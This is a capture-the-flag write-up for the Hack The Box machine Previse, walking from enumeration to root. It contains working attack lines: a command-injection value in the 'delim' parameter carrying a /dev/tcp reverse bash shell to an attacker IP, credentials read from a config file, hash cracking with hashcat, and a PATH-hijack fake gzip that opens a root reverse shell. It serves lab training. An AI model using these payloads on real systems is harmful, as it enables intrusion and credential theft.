--- search: exclude: true --- # Previse Writeup ![](img/64.png) ## Introduction : Previse is an easy Linux box released back in August 2021. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB] → sudo vim /etc/hosts [sudo] password for nothing: [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB] → cat /etc/hosts | tail -n1 10.129.111.192 previse.htb [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB] → nmap -sCV previse.htb Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-29 21:49 CEST Nmap scan report for previse.htb (10.129.111.192) Host is up (0.037s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA) | 256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA) |_ 256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-title: Previse Login |_Requested resource was login.php |_http-server-header: Apache/2.4.29 (Ubuntu) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.47 seconds ## **Part 2 : Getting User Access** Our nmap scan picked up port 80 so let's investigate it: ![](prg/64_001.png) [ 10.66.66.2/32 ] [ /dev/pts/4 ] [~/HTB] → gobuster dir -t 50 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://previse.htb/ -x php,txt,html,css,js,pdf =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://previse.htb/ [+] Method: GET [+] Threads: 50 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: txt,html,css,js,pdf,php [+] Timeout: 10s =============================================================== 2022/05/01 15:09:49 Starting gobuster in directory enumeration mode =============================================================== /files.php (Status: 302) [Size: 4914] [--> login.php] /header.php (Status: 200) [Size: 980] /nav.php (Status: 200) [Size: 1248] /login.php (Status: 200) [Size: 2224] /download.php (Status: 302) [Size: 0] [--> login.php] /footer.php (Status: 200) [Size: 217] /index.php (Status: 302) [Size: 2801] [--> login.php] /css (Status: 301) [Size: 308] [--> http://previse.htb/css/] /status.php (Status: 302) [Size: 2966] [--> login.php] /js (Status: 301) [Size: 307] [--> http://previse.htb/js/] /logout.php (Status: 302) [Size: 0] [--> login.php] /accounts.php (Status: 302) [Size: 3994] [--> login.php] /config.php (Status: 200) [Size: 0] /logs.php (Status: 302) [Size: 0] [--> login.php] Now let's visit **http://previse.htb/accounts.php** and intercept it with burpsuite: ![](prg/64_002.png) ![](prg/64_003.png) Now here we see something strange, the response we get is a 302 redirection, but the page it is supposed NOT to show gets displayed anyway: ![](prg/64_004.png) So instead let's just intercept the request, and and also intercept the response to this request: ![](prg/64_005.png) ![](prg/64_006.png) ![](prg/64_007.png) Then once you click forward, you can create a user: ![](prg/64_008.png) Then just login: ![](prg/64_009.png) Then we can download the website files: ![](prg/64_010.png) Here we see that we can download a backup of the website, but also upload files: ![](prg/64_011.png) So first let's downlaod the website backup: [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse] → mv ~/Downloads/siteBackup.zip . [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse] → mkdir www [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse] → mv siteBackup.zip www [ 10.66.66.2/32 ] [ /dev/pts/6 ] [~/HTB/Previse] → cd www [ 10.66.66.2/32 ] [ /dev/pts/6 ] [HTB/Previse/www] → unzip siteBackup.zip Archive: siteBackup.zip inflating: accounts.php inflating: config.php inflating: download.php inflating: file_logs.php inflating: files.php inflating: footer.php inflating: header.php inflating: index.php inflating: login.php inflating: logout.php inflating: logs.php inflating: nav.php inflating: status.php Now let's look at those files to see if there is any system-side command that can be ran:: [ 10.66.66.2/32 ] [ /dev/pts/6 ] [HTB/Previse/www] → grep -oP 'exec.*' * logs.php:exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}"); And here we see that the logs.php file has a line which runs a python script (log_process.py) that takes the **delim** parameter value as arguement. So let's intercept the POST request to that page: ![](prg/64_012.png) ![](prg/64_013.png) Here we see that the webpage took approximately 0.5 second to load. Now let's try to see if we have command execution by running the sleep command: ![](prg/64_014.png) And here we see that we managed to execute a system command, because we manmaged to make it wait one additional second more. So let's try to get a reverse bash shell: delim=comma ; bash -c 'bash -i >& /dev/tcp/10.10.14.68/9001 0>&1' CTRL+U to url encode it: delim=comma ; bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.68/9001+0>%261' Then send it: ![](prg/64_016.png) And we have a reverse shell as www-data! Now let's upgrade our reverse shell to a fully interactive TTY: [ 10.10.14.68/23 ] [ /dev/pts/22 ] [~] → nc -lvnp 9001 Connection from 10.129.95.185:59414 bash: cannot set terminal process group (1568): Inappropriate ioctl for device bash: no job control in this shell www-data@previse:/var/www/html$ id id uid=33(www-data) gid=33(www-data) groups=33(www-data) www-data@previse:/var/www/html$ which python python3 curl wget which python python3 curl wget /usr/bin/python /usr/bin/python3 /usr/bin/curl /usr/bin/wget www-data@previse:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@previse:/var/www/html$ ^Z [1] + 1698749 suspended nc -lvnp 9001 [ 10.10.14.68/23 ] [ /dev/pts/22 ] [~] → stty raw -echo ; fg [1] + 1698749 continued nc -lvnp 9001 export TERM=screen-256color www-data@previse:/var/www/html$ export SHELL=bash www-data@previse:/var/www/html$ stty rows 50 cols 200 www-data@previse:/var/www/html$ reset Now that we have a fully interactive TTY let's enumerate the host using linpeas.sh: [term1] [ 10.10.14.68/23 ] [ /dev/pts/6 ] [~/HTB/Previse] → cp ../Cap/linpeas.sh . [ 10.10.14.68/23 ] [ /dev/pts/6 ] [~/HTB/Previse] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... 10.129.95.185 - - [02/May/2022 13:03:29] "GET /linpeas.sh HTTP/1.1" 200 - [term2] www-data@previse:/var/www/html$ wget http://10.10.14.68:9090/linpeas.sh -O /tmp/peas.sh --2022-05-02 11:03:22-- http://10.10.14.68:9090/linpeas.sh Connecting to 10.10.14.68:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 776167 (758K) [application/x-sh] Saving to: '/tmp/peas.sh' /tmp/peas.sh 100%[=============================================================================================================>] 757.98K 1.41MB/s in 0.5s 2022-05-02 11:03:23 (1.41 MB/s) - '/tmp/peas.sh' saved [776167/776167] www-data@previse:/var/www/html$ chmod +x /tmp/peas.sh www-data@previse:/var/www/html$ /tmp/peas.sh ` ![](prg/64_017.png) Looking at linpeas.sh's output we see that there is a mysql database on the server: ![](prg/64_018.png) And when we look at the config.php file we see the mysql password: www-data@previse:/var/www/html$ ls -lash total 188K 4.0K drwxr-xr-x 4 www-data www-data 4.0K Jul 26 2021 . 4.0K drwxr-xr-x 3 root root 4.0K Jul 26 2021 .. 8.0K -rw-r--r-- 1 www-data www-data 5.6K Jun 12 2021 accounts.php 16K -rwxrwxr-x 1 www-data www-data 16K Jun 3 2021 android-chrome-192x192.png 52K -rwxrwxr-x 1 www-data www-data 50K Jun 3 2021 android-chrome-512x512.png 16K -rwxrwxr-x 1 www-data www-data 14K Jun 3 2021 apple-touch-icon.png 4.0K -rw-r--r-- 1 www-data www-data 208 Jun 12 2021 config.php 4.0K drwxr-xr-x 2 www-data www-data 4.0K Jul 26 2021 css 4.0K -rw-r--r-- 1 www-data www-data 1.6K Jun 9 2021 download.php 4.0K -rwxrwxr-x 1 www-data www-data 724 Jun 3 2021 favicon-16x16.png 4.0K -rwxrwxr-x 1 www-data www-data 1.7K Jun 3 2021 favicon-32x32.png 16K -rwxrwxr-x 1 www-data www-data 16K Jun 3 2021 favicon.ico 4.0K -rw-r--r-- 1 www-data www-data 1.2K Jun 12 2021 file_logs.php 8.0K -rw-r--r-- 1 www-data www-data 6.0K Jun 9 2021 files.php 4.0K -rw-r--r-- 1 www-data www-data 217 Jun 3 2021 footer.php 4.0K -rw-r--r-- 1 www-data www-data 1012 Jun 6 2021 header.php 4.0K -rw-r--r-- 1 www-data www-data 551 Jun 6 2021 index.php 4.0K drwxr-xr-x 2 www-data www-data 4.0K Jul 26 2021 js 4.0K -rw-r--r-- 1 www-data www-data 2.9K Jun 12 2021 login.php 4.0K -rw-r--r-- 1 www-data www-data 190 Jun 8 2021 logout.php 4.0K -rw-r--r-- 1 www-data www-data 1.2K Jun 9 2021 logs.php 4.0K -rw-r--r-- 1 www-data www-data 1.3K Jun 5 2021 nav.php 4.0K -rwxrwxr-x 1 www-data www-data 263 Jun 3 2021 site.webmanifest 4.0K -rw-r--r-- 1 www-data www-data 1.9K Jun 9 2021 status.php www-data@previse:/var/www/html$ cat config.php <****?php function connectDB(){ $host = 'localhost'; $user = 'root'; $passwd = 'mySQL_p@ssw0rd!:)'; $db = 'previse'; $mycon = new mysqli($host, $user, $passwd, $db); return $mycon; } ?****> And we have the mysql credentials! **root:mySQL_p@ssw0rd!:)** www-data@previse:/var/www/html$ mysql -u root -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 19 Server version: 5.7.35-0ubuntu0.18.04.1 (Ubuntu) Copyright (c) 2000, 2021, Oracle and/or its affiliates. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | mysql | | performance_schema | | previse | | sys | +--------------------+ 5 rows in set (0.01 sec) Let's take a look at the previse database: mysql> use previse; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +-------------------+ | Tables_in_previse | +-------------------+ | accounts | | files | +-------------------+ 2 rows in set (0.00 sec) mysql> describe accounts; +------------+--------------+------+-----+-------------------+----------------+ | Field | Type | Null | Key | Default | Extra | +------------+--------------+------+-----+-------------------+----------------+ | id | int(11) | NO | PRI | NULL | auto_increment | | username | varchar(50) | NO | UNI | NULL | | | password | varchar(255) | NO | | NULL | | | created_at | datetime | YES | | CURRENT_TIMESTAMP | | +------------+--------------+------+-----+-------------------+----------------+ 4 rows in set (0.00 sec) mysql> select * from accounts; +----+----------+------------------------------------+---------------------+ | id | username | password | created_at | +----+----------+------------------------------------+---------------------+ | 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 | | 2 | nihilist | $1$🧂llol$2LVHOe2s.o1uq/rzC1K1A0 | 2022-05-02 10:27:41 | +----+----------+------------------------------------+---------------------+ Now here we see that the password field has a weird character in the middle, so to make sure we transfer it correctly to our machine let's use base64: [term1] mysql> select TO_BASE64(password) from accounts where id=1; +--------------------------------------------------+ | TO_BASE64(password) | +--------------------------------------------------+ | JDEk8J+ngmxsb2wkRFFwbWR2bmI3RWV1TzZVYXFSSXRmLg== | +--------------------------------------------------+ 1 row in set (0.00 sec) [term2] [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse] → vim pass.b64 [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse] → cat pass.b64 JDEk8J+ngmxsb2wkRFFwbWR2bmI3RWV1TzZVYXFSSXRmLg== [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse] → cat pass.b64 | base64 -d > pass.hash Now let's use hashcat to crack the hash using the rockyou.txt wordlist: [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse] → hashcat -m 500 -a 0 '$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.' /usr/share/seclists/rockyou.txt hashcat (v6.2.5) starting * Device #1: WARNING! Kernel exec timeout is not disabled. This may cause "CL_OUT_OF_RESOURCES" or related errors. To disable the timeout, see: https://hashcat.net/q/timeoutpatch * Device #2: WARNING! Kernel exec timeout is not disabled. This may cause "CL_OUT_OF_RESOURCES" or related errors. To disable the timeout, see: https://hashcat.net/q/timeoutpatch CUDA API (CUDA 11.6) ==================== * Device #1: NVIDIA GeForce RTX 3070 Ti, 4258/7979 MB, 48MCU OpenCL API (OpenCL 3.0 CUDA 11.6.127) - Platform #1 [NVIDIA Corporation] ======================================================================== * Device #2: NVIDIA GeForce RTX 3070 Ti, skipped Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 1356 MB Dictionary cache hit: * Filename..: /usr/share/seclists/rockyou.txt * Passwords.: 14344384 * Bytes.....: 139921497 * Keyspace..: 14344384 Cracking performance lower than expected? * Append -O to the commandline. This lowers the maximum supported password/salt length (usually down to 32). * Append -w 3 to the commandline. This can cause your screen to lag. * Append -S to the commandline. This has a drastic speed impact but can be better for specific attacks. Typical scenarios are a small wordlist but a large ruleset. * Update your backend API runtime / driver the right way: https://hashcat.net/faq/wrongdriver * Create more work items to make use of your parallelization power: https://hashcat.net/faq/morework **$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.:ilovecody112235!** Session..........: hashcat Status...........: Cracked Hash.Mode........: 500 (md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)) Hash.Target......: $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. Time.Started.....: Mon May 2 13:22:23 2022 (10 secs) Time.Estimated...: Mon May 2 13:22:33 2022 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/seclists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 780.8 kH/s (11.24ms) @ Accel:16 Loops:125 Thr:256 Vec:1 Recovered........: 1/1 (100.00%) Digests Progress.........: 7471104/14344384 (52.08%) Rejected.........: 0/7471104 (0.00%) Restore.Point....: 7274496/14344384 (50.71%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000 Candidate.Engine.: Device Generator Candidates.#1....: ivanisaac -> iarmy Hardware.Mon.#1..: Temp: 53c Fan: 64% Util: 75% Core:1950MHz Mem:9501MHz Bus:16 Started: Mon May 2 13:22:23 2022 Stopped: Mon May 2 13:22:34 2022 And we cracked the hash! now let's try to ssh in as the user m4lwhere using that password: [ 10.10.14.68/23 ] [ /dev/pts/23 ] [~/HTB/Previse] → ssh m4lwhere@previse.htb The authenticity of host 'previse.htb (10.129.95.185)' can't be established. ED25519 key fingerprint is SHA256:BF5tg2bhcRrrCuaeVQXikjd8BCPxgLsnnwHlaBo3dPs. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'previse.htb' (ED25519) to the list of known hosts. m4lwhere@previse.htb's password: Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-151-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon May 2 11:24:33 UTC 2022 System load: 0.0 Processes: 177 Usage of /: 54.7% of 4.85GB Users logged in: 0 Memory usage: 47% IP address for eth0: 10.129.95.185 Swap usage: 0% 0 updates can be applied immediately. Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5 m4lwhere@previse:~$ id uid=1000(m4lwhere) gid=1000(m4lwhere) groups=1000(m4lwhere) m4lwhere@previse:~$ cat user.txt 23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to login as the user m4lwhere, and we got the user flag. ## **Part 3 : Getting Root Access** Now in order to get to the root user let's enumerate the box with linpeas.sh, this time as the m4lwhere user: m4lwhere@previse:~$ wget http://10.10.14.68:9090/linpeas.sh -O /tmp/peas.sh --2022-05-02 11:27:21-- http://10.10.14.68:9090/linpeas.sh Connecting to 10.10.14.68:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 776167 (758K) [application/x-sh] Saving to: ‘/tmp/peas.sh’ /tmp/peas.sh 100%[===================================================================================>] 757.98K 1.99MB/s in 0.4s 2022-05-02 11:27:22 (1.99 MB/s) - ‘/tmp/peas.sh’ saved [776167/776167] m4lwhere@previse:~$ chmod +x /tmp/peas.sh m4lwhere@previse:~$ /tmp/peas.sh Looking at the output we see the following: ![](prg/64_019.png) And when we run sudo -l we see that our current m4lwhere user can run this script as root: m4lwhere@previse:~$ sudo -l [sudo] password for m4lwhere: User m4lwhere may run the following commands on previse: (root) /opt/scripts/access_backup.sh So let's see what commands are being ran by that script: m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh #!/bin/bash # We always make sure to store logs, we take security SERIOUSLY here # I know I shouldnt run this as root but I cant figure it out programmatically on my account # This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz So in this script the gzip command is not being run with the absolute path. So let's create a new gzip bash script: m4lwhere@previse:~$ vim gzip m4lwhere@previse:~$ cat gzip #!/bin/sh bash -c 'bash -i >& /dev/tcp/10.10.14.68/9002 0>&1' m4lwhere@previse:~$ chmod +x gzip m4lwhere@previse:~$ which gzip /bin/gzip m4lwhere@previse:~$ echo $PATH /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin Now we want our new gzip file to be ran instead of the default /bin/gzip binary, so let's add the current working directory into the PATH variable: m4lwhere@previse:~$ export PATH=.:$PATH m4lwhere@previse:~$ echo $PATH .:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin m4lwhere@previse:~$ which gzip ./gzip And now when we run the backup script as the root user we should get reverse shell as the root user on port 9002: [term1] m4lwhere@previse:~$ sudo /opt/scripts/access_backup.sh [term2] [ 10.10.14.68/23 ] [ /dev/pts/24 ] [~/HTB/Previse] → nc -lvnp 9002 Connection from 10.129.95.185:59276 root@previse:~# id id uid=0(root) gid=0(root) groups=0(root) root@previse:~# cat /root/root.txt cat /root/root.txt 26XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And there you go! We managed to get the root flag. ## **Conclusion** Here we can see the progress graph : ![](img/64_graph.png)